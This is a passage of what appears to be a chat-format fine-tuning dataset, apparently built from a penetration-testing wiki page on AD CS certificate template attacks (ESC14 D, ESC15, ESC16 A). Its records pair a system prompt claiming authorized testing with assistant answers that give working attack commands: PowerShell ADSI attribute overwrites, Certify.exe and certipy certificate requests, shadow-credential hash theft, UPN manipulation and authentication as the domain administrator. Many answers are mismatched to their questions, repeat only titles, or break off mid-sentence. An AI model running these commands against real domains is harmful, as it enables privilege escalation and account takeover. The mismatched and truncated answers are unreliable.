CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN\n> * The certificate does not have any of the following flags: CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH and CT_FLAG_SUBJECT_REQUIRE_EMAIL\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1\n\nIn this example, the target has the explicit mapping value X509:CN=TARGET. One must change the dNSHostName of the victim (in this case a computer) to equal $TARGET.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the dNSHostName attribute of the victim can be overwritten with the following python script to b", "metadata": {"corpus_index": 126, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - (ESC14 D) Target with X509SubjectOnly?"}, {"role": "assistant", "content": "The target has an explicit weak mapping of type X509SubjectOnly. The attacker can modify the cn or dNSHostName attribute of the victim to match the subject of the X509SubjectOnly mapping of the target. It is then possible to enroll on the certificate template with the victim, and use the resulting certificate to authenticate as the target.\n\nFor this attack, _some_ additional prerequisites are necessary:\n\n> [!WARNING]\n> * The target already has at least one X509SubjectOnly mapping in altSecurityIdentities\n> * If the victim is a user:\n > * The attacker can modify the cn and name attributes of the victim (to change the cn, the name must match)\n > * If the target is a user and the X509SubjectOnly mapping has the current value of the cn attribute of the target as its identifier, the victim and the target cannot be in the same container (the DC will not allow the cn of the victim to be set according to the cn of the target if they are in the same container, as this would mean that they have the same distinguishedName)\n> * If the victim is a machine: the attacker has write access to the dNSHostName attribute\n> * The certificate template indicates CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag\n> * The template has one of the following flags in msPKI-Certificate-Name-Flag: CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME or CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN\n> * The certificate does not have any of the following flags: CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH and CT_FLAG_SUBJECT_REQUIRE_EMAIL\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1\n\nIn this example, the target has the explicit mapping value X509:CN=TARGET. One must change the dNSHostName of the victim (in this case a computer) to equal $TARGET.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the dNSHostName attribute of the victim can be overwritten with the following python script to b"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - (ESC14 D) Target with X509SubjectOnly?", "response": "The target has an explicit weak mapping of type X509SubjectOnly. The attacker can modify the cn or dNSHostName attribute of the victim to match the subject of the X509SubjectOnly mapping of the target. It is then possible to enroll on the certificate template with the victim, and use the resulting certificate to authenticate as the target.\n\nFor this attack, _some_ additional prerequisites are necessary:\n\n> [!WARNING]\n> * The target already has at least one X509SubjectOnly mapping in altSecurityIdentities\n> * If the victim is a user:\n > * The attacker can modify the cn and name attributes of the victim (to change the cn, the name must match)\n > * If the target is a user and the X509SubjectOnly mapping has the current value of the cn attribute of the target as its identifier, the victim and the target cannot be in the same container (the DC will not allow the cn of the victim to be set according to the cn of the target if they are in the same container, as this would mean that they have the same distinguishedName)\n> * If the victim is a machine: the attacker has write access to the dNSHostName attribute\n> * The certificate template indicates CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag\n> * The template has one of the following flags in msPKI-Certificate-Name-Flag: CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME or CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN\n> * The certificate does not have any of the following flags: CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH and CT_FLAG_SUBJECT_REQUIRE_EMAIL\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1\n\nIn this example, the target has the explicit mapping value X509:CN=TARGET. One must change the dNSHostName of the victim (in this case a computer) to equal $TARGET.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the dNSHostName attribute of the victim can be overwritten with the following python script to b", "metadata": {"corpus_index": 126, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the victim command to certificate templates - (esc14 d) target with x509subjectonly"}, {"role": "assistant", "content": "$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Computers,DC=domain,DC=local\"\n$victim.Properties[\"dNSHostName\"].Value = $TARGET\n$victim.CommitChanges()"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the victim command to certificate templates - (esc14 d) target with x509subjectonly", "response": "$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Computers,DC=domain,DC=local\"\n$victim.Properties[\"dNSHostName\"].Value = $TARGET\n$victim.CommitChanges()", "metadata": {"corpus_index": 127, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "victim"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC14 D) Target with X509SubjectOnly?"}, {"role": "assistant", "content": "$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Computers,DC=domain,DC=local\"\n$victim.Properties[\"dNSHostName\"].Value = $TARGET\n$victim.CommitChanges()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC14 D) Target with X509SubjectOnly?", "response": "$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Computers,DC=domain,DC=local\"\n$victim.Properties[\"dNSHostName\"].Value = $TARGET\n$victim.CommitChanges()", "metadata": {"corpus_index": 127, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Computers,DC=domain,DC=local\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 d) target with x509subjectonly. (ESC14 D) Target with X509SubjectOnly"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Computers,DC=domain,DC=local\"`?", "response": "This command is used for certificate templates - (esc14 d) target with x509subjectonly. (ESC14 D) Target with X509SubjectOnly", "metadata": {"corpus_index": 127, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Certify.exe command to certificate templates - (esc14 d) target with x509subjectonly"}, {"role": "assistant", "content": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE /machine"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Certify.exe command to certificate templates - (esc14 d) target with x509subjectonly", "response": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE /machine", "metadata": {"corpus_index": 128, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Certify.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate templates - (ESC14 D) Target with X509SubjectOnly"}, {"role": "assistant", "content": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE /machine"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate templates - (ESC14 D) Target with X509SubjectOnly", "response": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE /machine", "metadata": {"corpus_index": 128, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Certify.exe request /ca:domain\\ca /template:$TEMPLATE /machine`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 d) target with x509subjectonly. (ESC14 D) Target with X509SubjectOnly"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Certify.exe request /ca:domain\\ca /template:$TEMPLATE /machine`?", "response": "This command is used for certificate templates - (esc14 d) target with x509subjectonly. (ESC14 D) Target with X509SubjectOnly", "metadata": {"corpus_index": 128, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Certificate templates - (ESC15 - CVE-2024-49019) Arbitrary application policy"}, {"role": "assistant", "content": "> [!NOTE] NOTE\n> This privilege escalation has been marked as CVE-2024-49019 by Microsoft, and will therefore no longer be exploitable on patched systems.\n\nBy default, the X509 standard uses EKUs to indicate the possible uses of a certificate. Under Windows, a field called Application Policy is added to certificates, and this does the same thing as EKUs, but with a few more options. If both EKUs and application policies are present in a certificate, the latter takes precedence.\n\nIt turns out that if a certificate template uses version 1 of the certificate templates, authorises the SAN specification, and if it is possible to enrol on it, then it is possible to request a certificate by specifying an arbitrary user and requesting an arbitrary application policy.\n\n> [!TIP] TIP\n> Note, however, that specifying \"Client Authentication\" in application policy will only allow SChannel authentication and not PKINIT. On the other hand, by specifying \"Certificate Request Agent\" (1.3.6.1.4.1.311.20.2.1), the certificate can be used as an ESC3.\n\nYou can see the ESC15 as an ESC2 with more steps.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this pull request on Certipy (Python) can be used to enumerate for, and conduct, the ESC15 scenario. \n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Certificate templates - (ESC15 - CVE-2024-49019) Arbitrary application policy", "response": "> [!NOTE] NOTE\n> This privilege escalation has been marked as CVE-2024-49019 by Microsoft, and will therefore no longer be exploitable on patched systems.\n\nBy default, the X509 standard uses EKUs to indicate the possible uses of a certificate. Under Windows, a field called Application Policy is added to certificates, and this does the same thing as EKUs, but with a few more options. If both EKUs and application policies are present in a certificate, the latter takes precedence.\n\nIt turns out that if a certificate template uses version 1 of the certificate templates, authorises the SAN specification, and if it is possible to enrol on it, then it is possible to request a certificate by specifying an arbitrary user and requesting an arbitrary application policy.\n\n> [!TIP] TIP\n> Note, however, that specifying \"Client Authentication\" in application policy will only allow SChannel authentication and not PKINIT. On the other hand, by specifying \"Certificate Request Agent\" (1.3.6.1.4.1.311.20.2.1), the certificate can be used as an ESC3.\n\nYou can see the ESC15 as an ESC2 with more steps.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this pull request on Certipy (Python) can be used to enumerate for, and conduct, the ESC15 scenario. \n\n```bash", "metadata": {"corpus_index": 129, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate templates - (ESC15 - CVE-2024-49019) Arbitrary application policy during a pentest?"}, {"role": "assistant", "content": "> [!NOTE] NOTE\n> This privilege escalation has been marked as CVE-2024-49019 by Microsoft, and will therefore no longer be exploitable on patched systems.\n\nBy default, the X509 standard uses EKUs to indicate the possible uses of a certificate. Under Windows, a field called Application Policy is added to certificates, and this does the same thing as EKUs, but with a few more options. If both EKUs and application policies are present in a certificate, the latter takes precedence.\n\nIt turns out that if a certificate template uses version 1 of the certificate templates, authorises the SAN specification, and if it is possible to enrol on it, then it is possible to request a certificate by specifying an arbitrary user and requesting an arbitrary application policy.\n\n> [!TIP] TIP\n> Note, however, that specifying \"Client Authentication\" in application policy will only allow SChannel authentication and not PKINIT. On the other hand, by specifying \"Certificate Request Agent\" (1.3.6.1.4.1.311.20.2.1), the certificate can be used as an ESC3.\n\nYou can see the ESC15 as an ESC2 with more steps.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this pull request on Certipy (Python) can be used to enumerate for, and conduct, the ESC15 scenario. \n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate templates - (ESC15 - CVE-2024-49019) Arbitrary application policy during a pentest?", "response": "> [!NOTE] NOTE\n> This privilege escalation has been marked as CVE-2024-49019 by Microsoft, and will therefore no longer be exploitable on patched systems.\n\nBy default, the X509 standard uses EKUs to indicate the possible uses of a certificate. Under Windows, a field called Application Policy is added to certificates, and this does the same thing as EKUs, but with a few more options. If both EKUs and application policies are present in a certificate, the latter takes precedence.\n\nIt turns out that if a certificate template uses version 1 of the certificate templates, authorises the SAN specification, and if it is possible to enrol on it, then it is possible to request a certificate by specifying an arbitrary user and requesting an arbitrary application policy.\n\n> [!TIP] TIP\n> Note, however, that specifying \"Client Authentication\" in application policy will only allow SChannel authentication and not PKINIT. On the other hand, by specifying \"Certificate Request Agent\" (1.3.6.1.4.1.311.20.2.1), the certificate can be used as an ESC3.\n\nYou can see the ESC15 as an ESC2 with more steps.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this pull request on Certipy (Python) can be used to enumerate for, and conduct, the ESC15 scenario. \n\n```bash", "metadata": {"corpus_index": 129, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Request a certificate with \"Certificate Request Agent\" application policy work?"}, {"role": "assistant", "content": "certipy req -u $USER@$DOMAIN --application-policies \"1.3.6.1.4.1.311.20.2.1\" -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Request a certificate with \"Certificate Request Agent\" application policy work?", "response": "certipy req -u $USER@$DOMAIN --application-policies \"1.3.6.1.4.1.311.20.2.1\" -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP", "metadata": {"corpus_index": 130, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Request a certificate with \"Certificate Request Agent\" application policy"}, {"role": "assistant", "content": "certipy req -u $USER@$DOMAIN --application-policies \"1.3.6.1.4.1.311.20.2.1\" -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Request a certificate with \"Certificate Request Agent\" application policy", "response": "certipy req -u $USER@$DOMAIN --application-policies \"1.3.6.1.4.1.311.20.2.1\" -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP", "metadata": {"corpus_index": 130, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Use the certificate in a ESC3 scenario to ask for a new certificate on behalf of another user in the context of penetration testing"}, {"role": "assistant", "content": "certipy req -u $USER@$DOMAIN -on-behalf-of $DOMAIN\\\\Administrator -template User -ca $CA_NAME -pfx cert.pfx -dc-ip $DC_IP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Use the certificate in a ESC3 scenario to ask for a new certificate on behalf of another user in the context of penetration testing", "response": "certipy req -u $USER@$DOMAIN -on-behalf-of $DOMAIN\\\\Administrator -template User -ca $CA_NAME -pfx cert.pfx -dc-ip $DC_IP", "metadata": {"corpus_index": 131, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Use the certificate in a ESC3 scenario to ask for a new certificate on behalf of another user during a pentest?"}, {"role": "assistant", "content": "certipy req -u $USER@$DOMAIN -on-behalf-of $DOMAIN\\\\Administrator -template User -ca $CA_NAME -pfx cert.pfx -dc-ip $DC_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Use the certificate in a ESC3 scenario to ask for a new certificate on behalf of another user during a pentest?", "response": "certipy req -u $USER@$DOMAIN -on-behalf-of $DOMAIN\\\\Administrator -template User -ca $CA_NAME -pfx cert.pfx -dc-ip $DC_IP", "metadata": {"corpus_index": 131, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Authenticate with the last certificate"}, {"role": "assistant", "content": "certipy auth -pfx administrator.pfx -dc-ip $DC_ADDR\n```\n\n=== Windows\n\n_At the time of writing, no solution exists to perform this attack from a Windows machine._\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Authenticate with the last certificate", "response": "certipy auth -pfx administrator.pfx -dc-ip $DC_ADDR\n```\n\n=== Windows\n\n_At the time of writing, no solution exists to perform this attack from a Windows machine._\n\n:::", "metadata": {"corpus_index": 132, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Authenticate with the last certificate?"}, {"role": "assistant", "content": "certipy auth -pfx administrator.pfx -dc-ip $DC_ADDR\n```\n\n=== Windows\n\n_At the time of writing, no solution exists to perform this attack from a Windows machine._\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Authenticate with the last certificate?", "response": "certipy auth -pfx administrator.pfx -dc-ip $DC_ADDR\n```\n\n=== Windows\n\n_At the time of writing, no solution exists to perform this attack from a Windows machine._\n\n:::", "metadata": {"corpus_index": 132, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Certificate templates - (ESC16) Security Extension Disabled on CA work?"}, {"role": "assistant", "content": "The ESC16 vulnerability occurs when a Certification Authority (CA) is configured to disable the inclusion of the OID 1.3.6.1.4.1.311.25.2 (the security extension) in all certificates it issues, or if the KB5014754 patch has not been applied. This flaw causes the CA to behave as if all its published templates are vulnerable to the ESC9 vector.\n\nThere are two possible attack scenarios for exploiting ESC16. In all cases, one of the following prerequisites must be met:\n\n> [!WARNING]\n> * szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) included into the policy\\DisableExtensionList of the CA.\n> * The KB5014754 May 2022 patch isn't applied, which implies that szOID_NTDS_CA_SECURITY_EXT cannot be issued by the CA."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Certificate templates - (ESC16) Security Extension Disabled on CA work?", "response": "The ESC16 vulnerability occurs when a Certification Authority (CA) is configured to disable the inclusion of the OID 1.3.6.1.4.1.311.25.2 (the security extension) in all certificates it issues, or if the KB5014754 patch has not been applied. This flaw causes the CA to behave as if all its published templates are vulnerable to the ESC9 vector.\n\nThere are two possible attack scenarios for exploiting ESC16. In all cases, one of the following prerequisites must be met:\n\n> [!WARNING]\n> * szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) included into the policy\\DisableExtensionList of the CA.\n> * The KB5014754 May 2022 patch isn't applied, which implies that szOID_NTDS_CA_SECURITY_EXT cannot be issued by the CA.", "metadata": {"corpus_index": 133, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - (ESC16) Security Extension Disabled on CA?"}, {"role": "assistant", "content": "The ESC16 vulnerability occurs when a Certification Authority (CA) is configured to disable the inclusion of the OID 1.3.6.1.4.1.311.25.2 (the security extension) in all certificates it issues, or if the KB5014754 patch has not been applied. This flaw causes the CA to behave as if all its published templates are vulnerable to the ESC9 vector.\n\nThere are two possible attack scenarios for exploiting ESC16. In all cases, one of the following prerequisites must be met:\n\n> [!WARNING]\n> * szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) included into the policy\\DisableExtensionList of the CA.\n> * The KB5014754 May 2022 patch isn't applied, which implies that szOID_NTDS_CA_SECURITY_EXT cannot be issued by the CA."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - (ESC16) Security Extension Disabled on CA?", "response": "The ESC16 vulnerability occurs when a Certification Authority (CA) is configured to disable the inclusion of the OID 1.3.6.1.4.1.311.25.2 (the security extension) in all certificates it issues, or if the KB5014754 patch has not been applied. This flaw causes the CA to behave as if all its published templates are vulnerable to the ESC9 vector.\n\nThere are two possible attack scenarios for exploiting ESC16. In all cases, one of the following prerequisites must be met:\n\n> [!WARNING]\n> * szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) included into the policy\\DisableExtensionList of the CA.\n> * The KB5014754 May 2022 patch isn't applied, which implies that szOID_NTDS_CA_SECURITY_EXT cannot be issued by the CA.", "metadata": {"corpus_index": 133, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certificate templates - (ESC16 A) Compatibility mode?"}, {"role": "assistant", "content": "In this scenario, the attacker has GenericWrite permission over a victim account, which can be used to overwrite the victim's UPN. Using the victim's NT hash obtained via a Shadow Credentials attack, it's possible to request a certificate from the CA on the victim's behalf. Thanks to the UPN manipulation, a valid certificate can be obtained for any user in the domain.\n\nTo conduct this scenario, the following additional prerequisites must be met:\n> [!WARNING]\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1. This will cause the KDC to check only the UPN of the SAN included in the certificate request\n> * The attacker user needs to have a GenericWrite or equivalent permission over the victim user\n\n::: tabs\n\n=== UNIX-like\n\nStep 1: Read the UPN of the victim\n``bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -user 'victim' \\\n read\n`\n\nStep 2: Update the victim account's UPN to the target administrator's samAccountName\n`bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'administrator' \\\n -user 'victim' update\n`\n\n(If needed) Retrieve the credentials for the victim (NT Hash)\n`bash\ncertipy shadow \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -account 'victim' \\\n auto\n`\n\nStep 3: Request the certificate as the victim user from a suitable authentication template (e.g., \"User\") \n`bash\ncertipy req \\\n -u \"victim@$DOMAIN\" -hashes \"$NT_HASH\" \\\n -ca DOMAIN-DC-CA -template User \\\n -upn \"administrator@$DOMAIN\" -dc-ip \"$DC_IP\"\n`\n\nStep 4: Revert the victim account's UPN\n`bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'victim@$DOMAIN' \\\n -user 'victim' update\n`\n\nStep 5: Authenticate as the target account\n`bash\ncertipy auth \\\n -dc-ip \"$DC_IP\" -pfx 'administrator.pfx' \\\n -username 'administrator' -domain \"$DOMAIN\"\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the targ"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certificate templates - (ESC16 A) Compatibility mode?", "response": "In this scenario, the attacker has GenericWrite permission over a victim account, which can be used to overwrite the victim's UPN. Using the victim's NT hash obtained via a Shadow Credentials attack, it's possible to request a certificate from the CA on the victim's behalf. Thanks to the UPN manipulation, a valid certificate can be obtained for any user in the domain.\n\nTo conduct this scenario, the following additional prerequisites must be met:\n> [!WARNING]\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1. This will cause the KDC to check only the UPN of the SAN included in the certificate request\n> * The attacker user needs to have a GenericWrite or equivalent permission over the victim user\n\n::: tabs\n\n=== UNIX-like\n\nStep 1: Read the UPN of the victim\n``bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -user 'victim' \\\n read\n`\n\nStep 2: Update the victim account's UPN to the target administrator's samAccountName\n`bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'administrator' \\\n -user 'victim' update\n`\n\n(If needed) Retrieve the credentials for the victim (NT Hash)\n`bash\ncertipy shadow \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip 